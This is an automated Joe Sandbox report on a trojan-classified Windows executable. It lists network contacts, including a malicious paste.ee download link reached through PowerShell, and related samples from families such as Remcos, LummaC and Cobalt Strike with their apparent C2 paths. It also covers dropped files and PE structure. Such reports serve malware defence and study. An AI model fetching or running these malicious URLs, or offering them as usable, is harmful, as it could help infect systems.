      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      paste.ee
      188.114.97.3
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://paste.ee/d/7BWJvtrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://github.com/aws/jsii.gitEwKKdCrEDu.exe, program.js.0.drfalse
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://github.com/aws/jsiiEwKKdCrEDu.exe, program.js.0.drfalse
              unknown
              http://json-schema.org/draft-07/schema#program.js.0.drfalse
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://aws.amazon.comEwKKdCrEDu.exe, program.js.0.drfalse
                    unknown
                    https://go.micropowershell.exe, 00000004.00000002.1687092302.000000000498D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://json-schema.org/schemaEwKKdCrEDu.exe, program.js.0.drfalse
                      unknown
                      https://contoso.com/powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://paste.ee/powershell.exe, 00000004.00000002.1687092302.00000000048FA000.00000004.00000800.00020000.00000000.sdmptrue
                        unknown
                        https://github.com/aws/jsii/issuesEwKKdCrEDu.exe, program.js.0.drfalse
                          unknown
                          https://github.com/jprichardson/node-fs-extra/issues/269program.js.0.drfalse
                            unknown
                            https://paste.eepowershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmptrue
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#program.js.0.drfalse
                                  unknown
                                  http://json-schema.org/draft-07/schemaEwKKdCrEDu.exe, program.js.0.drfalse
                                    unknown
                                    http://www.microsoft.coDpowershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      188.114.97.3
                                      paste.eeEuropean Union
                                      13335CLOUDFLARENETUStrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1543863
                                      Start date and time:2024-10-28 15:15:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 47s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:12
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:EwKKdCrEDu.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:2dc8cdf825e23ff1df1ad11b3a6f1973.exe
                                      Detection:MAL
                                      Classification:mal96.troj.evad.winEXE@9/7@1/1
                                      EGA Information:
                                      • Successful, ratio: 33.3%
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 17
                                      • Number of non-executed functions: 26
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target EwKKdCrEDu.exe, PID 6772 because there are no executed function
                                      • Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • VT rate limit hit for: EwKKdCrEDu.exe
                                      TimeTypeDescription
                                      10:16:34API Interceptor15x Sleep call for process: powershell.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      188.114.97.3PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                      SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                      • xilloolli.com/api.php?status=1&wallets=0&av=1
                                      5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                      • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                      PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                      • www.cc101.pro/4hfb/
                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • filetransfer.io/data-package/cDXpxO66/download
                                      Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                      • tech-tribune.shop/pLQvfD4d5/index.php
                                      WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                      • tech-tribune.shop/pLQvfD4d5/index.php
                                      yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                      • www.rs-ag.com/
                                      https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                      • aa.opencompanies.co.uk/vEXJm/
                                      Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                      • paste.ee/d/KXy1F
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      paste.eetransferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 188.114.96.3
                                      Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 188.114.96.3
                                      seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 188.114.97.3
                                      necgoodthingswithgreatthingsentirethingstobeinonline.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 188.114.97.3
                                      BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                      • 188.114.96.3
                                      20042024150836 14.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                      • 188.114.96.3
                                      segura.vbsGet hashmaliciousAsyncRATBrowse
                                      • 188.114.96.3
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSSalary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      Salary_Structure_Benefits_for_SridenourIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 188.114.96.3
                                      W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                      • 172.64.41.3
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 188.114.97.3
                                      INVOICE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                      • 188.114.97.3
                                      https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s553e3fe901654d86bcc4ed44c7c05dd3&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0V1a19QbFZsQVlaTnZNVHRSTWZBWGRNQmtvbDQ2b1NlN1o5MGFiazNzS3lGSlE_ZT1UMnQ4S3Y&wd=target%28Sezione%20senza%20titolo.one%7C8d7e5173-6006-4648-a69d-e39e66e7041a%2FAblehnung%20Rechnung%20R15946098273-KU30_WE02%20Vom%2028%5C%2F%7Cd77916b9-b471-429a-a13e-74764563e56b%2F%29&wdorigin=NavigationUrlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.21.79.135
                                      Okfjk1hs4kdhs2.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.9.13
                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eFedex.exeGet hashmaliciousAgentTeslaBrowse
                                      • 188.114.97.3
                                      come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 188.114.97.3
                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 188.114.97.3
                                      Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 188.114.97.3
                                      Sars Urgent Notice.pdfGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 188.114.97.3
                                      XWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      XWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      No context
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1510207563435464
                                      Encrypted:false
                                      SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                      MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                      SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                      SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                      SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e.................................^..............@..........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\EwKKdCrEDu.exe
                                      File Type:C++ source, ASCII text, with very long lines (324), with escape sequences
                                      Category:dropped
                                      Size (bytes):138639
                                      Entropy (8bit):4.286369825068587
                                      Encrypted:false
                                      SSDEEP:1536:ZMjsdRCCXpnzopj7/5dLopnQPporDa6meL4xmJ:fenLo9QP+lmeL4IJ
                                      MD5:A7C8367F8B900617374F5D3FAC86DFD7
                                      SHA1:6BDEAB34FA632083B2578708EB0C50443ED5E9A9
                                      SHA-256:E4F82DB7579D84B2DDB49B16A8CBD8256D86751473D1A86B4B31D1E3963BA0FA
                                      SHA-512:2C2E9D5445F4BDFBCA7F35881E9D133373145B40D26ECB9B122E60DD343B580FA3BC70C8B981B4AE7E3D9B8C4EA90C6A77F7328A60CBE0F2515EE364AD0CB0A3
                                      Malicious:false
                                      Preview:var __webpack_modules__ = {. 821: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. module = __webpack_require__.nmd(module);. const wrapAnsi16 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${code + offset}m`;. };. const wrapAnsi256 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${38 + offset};5;${code}m`;. };. const wrapAnsi16m = (fn, offset) => (...args) => {. const rgb = fn(...args);. return `.[${38 + offset};2;${rgb[0]};${rgb[1]};${rgb[2]}m`;. };. const ansi2ansi = n => n;. const rgb2rgb = (r, g, b) => [ r, g, b ];. const setLazyProperty = (object, property, get) => {. Object.defineProperty(object, property, {. get: () => {. const value = get();. Object.defineProperty(object, property, {.
                                      Process:C:\Users\user\Desktop\EwKKdCrEDu.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):218125
                                      Entropy (8bit):5.457704584855637
                                      Encrypted:false
                                      SSDEEP:3072:zKHyW445CPl85X3GJXlAnFhvMvOqGPUqdShdY5S8DoDT1JyBwJbMaky9nwe+L/Iq:LWY4KTvqd8dYQ8uJcwSy9nQ
                                      MD5:0FEFBA04D8BBEDD2CFF7EB75C3834847
                                      SHA1:054D11200D77C1B5DFB3B98A33973623619D34BE
                                      SHA-256:DBBDB23093B0732EE1504F79D3835B1C6B2E3F526AB42A6DA381E6CEC2648AE5
                                      SHA-512:3CEAA01275E2DEC044BA5F8D41092EB4F28E62CDAD24A71C8F7F57E4C48B709568C8C376BF2B048DC989810FB8EB91F2D944379804D5D85480A26663FC3F90FE
                                      Malicious:false
                                      Preview:{"version":3,"file":"bin/jsii-runtime.js","mappings":";;;;QAEA,MAAMA,aAAa,CAACC,IAAIC,WAAW,IAAIC;YACtC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAUC,OAAOF;AAAS;QAGlC,MAAMG,cAAc,CAACJ,IAAIC,WAAW,IAAIC;YACvC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAU,KAAKD,YAAYE;AAAO;QAG1C,MAAME,cAAc,CAACL,IAAIC,WAAW,IAAIC;YACvC,MAAMI,MAAMN,MAAME;YAClB,OAAO,KAAU,KAAKD,YAAYK,IAAI,MAAMA,IAAI,MAAMA,IAAI;AAAK;QAGhE,MAAMC,YAAYC,KAAKA;QACvB,MAAMC,UAAU,CAACC,GAAGC,GAAGC,MAAM,EAACF,GAAGC,GAAGC;QAEpC,MAAMC,kBAAkB,CAACC,QAAQC,UAAUC;YAC1CC,OAAOC,eAAeJ,QAAQC,UAAU;gBACvCC,KAAK;oBACJ,MAAMG,QAAQH;oBAEdC,OAAOC,eAAeJ,QAAQC,UAAU;wBACvCI;wBACAC,YAAY;wBACZC,cAAc;;oBAGf,OAAOF;AAAK;gBAEbC,YAAY;gBACZC,cAAc;;AACb;QAIH,IAAIC;QACJ,MAAMC,oBAAoB,CAACC,MAAMC,aAAaC,UAAUC;YACvD,IAAIL,iBAAiBM,WAAW;gBAC/BN,eAAe,oBAAQ;AACxB;YAEA,MAAMrB,SAAS0B,eAAe,KAAK;YACnC,MAAME,SAAS,CAAC;YAEhB,KAAK,OAAOC,aAAaC,UAAUd,OAAOe,QAAQV,eAAe;gBAChE,MAAMW,OAAOH,gBAAgB,WAAW,SAASA;gBACjD,IAAIA,gBAAgBL,aAAa;oBAChCI,OAAOI,QAAQT,KAAKE,UAAUzB;AAC/B,uBAAO,WAAW8B,UAAU,UAAU;oBACrCF,OAAOI,Q
                                      Process:C:\Users\user\Desktop\EwKKdCrEDu.exe
                                      File Type:ASCII text, with very long lines (489)
                                      Category:dropped
                                      Size (bytes):802466
                                      Entropy (8bit):4.298722687837962
                                      Encrypted:false
                                      SSDEEP:6144:Z6TjefxOXTNwk8mCkCbCp4wrZaWvZEIhU4FFEY+cbCtNYbIgoxrV2z1J:Z6TjefxOXTNUkCbCp42aW4NwL
                                      MD5:4C6E1287B2F6060C1E0F386B0B47959A
                                      SHA1:0FA0C721B6848D78C73FCF74BB37891A17FF0999
                                      SHA-256:C8DB5A41C7EC02EB2F1F20A6CD544DB215246AD9D566EA9494D63521B9B1E271
                                      SHA-512:0FF6A037A413BE93DCB3C1B4C26CB9938025F34D9AA20818FBDED5B4B00BC89DCBA9EB58756BAFBA852CA972C058BDDB087E9CB58C9B442AC936C93590E14C13
                                      Malicious:false
                                      Preview:var __webpack_modules__ = {. 1165: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. const fs = __webpack_require__(9896);. const path = __webpack_require__(6928);. const LCHOWN = fs.lchown ? "lchown" : "chown";. const LCHOWNSYNC = fs.lchownSync ? "lchownSync" : "chownSync";. const needEISDIRHandled = fs.lchown && !process.version.match(/v1[1-9]+\./) && !process.version.match(/v10\.[6-9]/);. const lchownSync = (path, uid, gid) => {. try {. return fs[LCHOWNSYNC](path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const chownSync = (path, uid, gid) => {. try {. return fs.chownSync(path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const handleEISDIR = needEISDIRHandled ? (path, uid, gid, cb) => er => {.
                                      Process:C:\Users\user\Desktop\EwKKdCrEDu.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):1155588
                                      Entropy (8bit):5.4159552687244155
                                      Encrypted:false
                                      SSDEEP:12288:D2DUMiOfGYFO/1pf0ThVUhI2PoEMuCfzT/2ZoEC74RiCfulDlJ:MZFO/1pf9hI2EjT/2ZoEC74RiCfulDlJ
                                      MD5:BE06DF1EE810220598CAE6D42AE2FD77
                                      SHA1:5DD0B0F101FDE69B49E37947380431D75D26125C
                                      SHA-256:09E18C6FA27068005DA8BCBB802C70B1C182866274478C684A4AB652ACAF2BBD
                                      SHA-512:BF40F52E37DFDBEE4AC4F562A28520893D3C8C13FDDB7A94E94458B1E8591162EADF3A4BE401A2FF6C2CE2449721F3F036C2B41571BB3C491E7F648595BAA8FA
                                      Malicious:false
                                      Preview:{"version":3,"file":"lib/program.js","mappings":";;;QACA,MAAMA,KAAK,oBAAQ;QACnB,MAAMC,OAAO,oBAAQ;QAGrB,MAAMC,SAASF,GAAGG,SAAS,WAAW;QAEtC,MAAMC,aAAaJ,GAAGK,aAAa,eAAe;QAGlD,MAAMC,oBAAoBN,GAAGG,WAC1BI,QAAQC,QAAQC,MAAM,kBACtBF,QAAQC,QAAQC,MAAM;QAEzB,MAAMJ,aAAa,CAACJ,MAAMS,KAAKC;YAC7B;gBACE,OAAOX,GAAGI,YAAYH,MAAMS,KAAKC;AACnC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAME,YAAY,CAACb,MAAMS,KAAKC;YAC5B;gBACE,OAAOX,GAAGc,UAAUb,MAAMS,KAAKC;AACjC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAMG,eACJT,oBAAoB,CAACL,MAAMS,KAAKC,KAAKK,OAAOJ;YAI1C,KAAKA,MAAMA,GAAGC,SAAS,UACrBG,GAAGJ,UAEHZ,GAAGiB,MAAMhB,MAAMS,KAAKC,KAAKK;AAAE,YAE7B,CAACE,GAAGC,IAAIC,KAAKJ,OAAOA;QAGxB,MAAMK,mBACJf,oBAAoB,CAACL,MAAMS,KAAKC;YAC9B;gBACE,OAAON,WAAWJ,MAAMS,KAAKC;AAC/B,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;gBACRE,UAAUb,MAAMS,KAAKC;AACvB;AAAA,YAEA,CAACV,MAAMS,KAAKC,QAAQN,WAAWJ,MAAMS,KAAKC;QAG9C,MAAMW,cAAcf,QAAQC;QAC5B,IAAIe,UAAU,CAACtB,MAAMuB,SAASR,OAAOhB,GAAGuB,QAAQtB,MAAMuB,SAASR;Q
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.486908350674156
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:EwKKdCrEDu.exe
                                      File size:16'803'840 bytes
                                      MD5:2dc8cdf825e23ff1df1ad11b3a6f1973
                                      SHA1:82af57e0e6d7cf944148d3a16d7c8ca94fa982f8
                                      SHA256:5d215747817125559e1a2d934c301ab466cbc956a6839c8a45f8b02b84b184d0
                                      SHA512:3f20bb95a167d10a2998a63ab0ccd69fe81822d24a39d868d019ac0ff890067c23c015dc0be531d9531be26d6d3f44d7f11c23214ba4778e038b6844f8c8879b
                                      SSDEEP:98304:dKulY9+o0L82IacWOEF8xbADr/xLCqjqdYCDBvYuSHFCxMg:DZVyj8/tCGiBdSHF7g
                                      TLSH:F9075A40FD8B40B5DA075871459BA17F27306C098B28DBCBF75C7A68EF332E24A76256
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........J................_.......................@..........................`.......$....@................................
                                      Icon Hash:00d6d9d3e49b13c4
                                      Entrypoint:0x479610
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:1
                                      File Version Major:6
                                      File Version Minor:1
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:1
                                      Import Hash:1aae8bf580c846f39c71c05898e57e88
                                      Instruction
                                      jmp 00007FFA40F09730h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      sub esp, 28h
                                      mov dword ptr [esp+1Ch], ebx
                                      mov dword ptr [esp+10h], ebp
                                      mov dword ptr [esp+14h], esi
                                      mov dword ptr [esp+18h], edi
                                      mov dword ptr [esp], eax
                                      mov dword ptr [esp+04h], ecx
                                      call 00007FFA40EE4756h
                                      mov eax, dword ptr [esp+08h]
                                      mov edi, dword ptr [esp+18h]
                                      mov esi, dword ptr [esp+14h]
                                      mov ebp, dword ptr [esp+10h]
                                      mov ebx, dword ptr [esp+1Ch]
                                      add esp, 28h
                                      retn 0004h
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      sub esp, 08h
                                      mov ecx, dword ptr [esp+0Ch]
                                      mov edx, dword ptr [ecx]
                                      mov eax, esp
                                      mov dword ptr [edx+04h], eax
                                      sub eax, 00010000h
                                      mov dword ptr [edx], eax
                                      add eax, 00000BA0h
                                      mov dword ptr [edx+08h], eax
                                      mov dword ptr [edx+0Ch], eax
                                      lea edi, dword ptr [ecx+34h]
                                      mov dword ptr [edx+18h], ecx
                                      mov dword ptr [edi], edx
                                      mov dword ptr [esp+04h], edi
                                      call 00007FFA40F0BB84h
                                      cld
                                      call 00007FFA40F0AC1Eh
                                      call 00007FFA40F09859h
                                      add esp, 08h
                                      ret
                                      jmp 00007FFA40F0BA30h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      mov ebx, dword ptr [esp+04h]
                                      mov ebp, esp
                                      mov dword ptr fs:[00000034h], 00000000h
                                      mov ecx, dword ptr [ebx+04h]
                                      cmp ecx, 00000000h
                                      je 00007FFA40F0BA31h
                                      mov eax, ecx
                                      shl eax, 02h
                                      sub esp, eax
                                      mov edi, esp
                                      mov esi, dword ptr [ebx+08h]
                                      cld
                                      rep movsd
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xfd80000x44c.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x10340000x1ac8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xfd90000x59074.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0xf4f6c00xb4.data
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x5f93b80x5f94001f28b8be1e3cede484d9e357668b4fdfunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x5fb0000x9527440x952800d56d6f34cfc5511150be34f251d282b7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xf4e0000x892a00x5f2009a6b5d4b4f2ec33e3a9321ec1ae7437cFalse0.3812571862680683data5.764059911027802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata0xfd80000x44c0x60007832c7a1d0e743908060559ac77cdebFalse0.359375OpenPGP Public Key3.8776437007407005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .reloc0xfd90000x590740x59200416ec19cab761a561c9c632271bf47adFalse0.5074070827489481data6.598814033769377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .symtab0x10330000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .rsrc0x10340000x1ac80x1c0009c8788bdf8c7a09d4b31f5ed4a27da7False0.3466796875data3.9915130218731956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x10341740x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.33815028901734107
